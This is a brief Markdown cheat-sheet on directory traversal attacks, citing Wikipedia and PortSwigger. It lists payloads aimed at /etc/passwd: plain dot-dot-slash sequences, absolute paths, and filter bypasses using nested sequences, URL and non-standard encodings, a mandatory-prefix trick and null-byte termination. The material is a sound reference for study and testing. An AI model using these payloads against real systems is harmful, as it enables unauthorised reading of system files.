# Directory traversal

> A directory traversal attack exploits insufficient security validation or sanitization of user-supplied file names, such that characters representing "traverse to parent directory" are passed through to the operating system's file system API.
>
> \-- [*Wikipedia*](https://en.wikipedia.org/wiki/Directory_traversal_attack)

* [PortSwigger - Web Security Academy - Directory traversal](https://portswigger.net/web-security/file-path-traversal)

## Attacks

### Traversal sequence (dot dot slash)

For each `../` you step up one directory. Just repeat this until you are in the root directory and then build up the path to the desired file from there.

```url
../../../etc/passwd
```

### Absolute path

Sometimes you can just supply an absolute path.

```url
/etc/passwd
```

### Bypass filters

#### Nested traversal sequences

When the traversal seqence is only stripped once and not recursively, you can use nested sequences, so that after stripping the inner one, there will still remain a traversal sequence, so `....//` becomes `../`.

```url
....//....//....//etc/passwd
```

#### URL encoding

Single URL encoding

```url
%2e%2e%2f
```

Double URL encoding (the `%`-char is also encoding, as `%25`)

```url
%252e%252e%252f
```

Non-standard encodings

```url
..%c0%af
..%ef%bc%8f
```

#### Mandatory prefix

If the app checks for a specific prefix, you may still be able to add traversal sequences to the file path.

```url
/var/www/images/../../../etc/passwd
```

#### Null byte termination

E.g. if the app checks for certain file extensions, you may be able to bypass the filter, by supplying a null byte `%00` and therefore termine the string early.

```url
../../../etc/passwd%00.jpg
```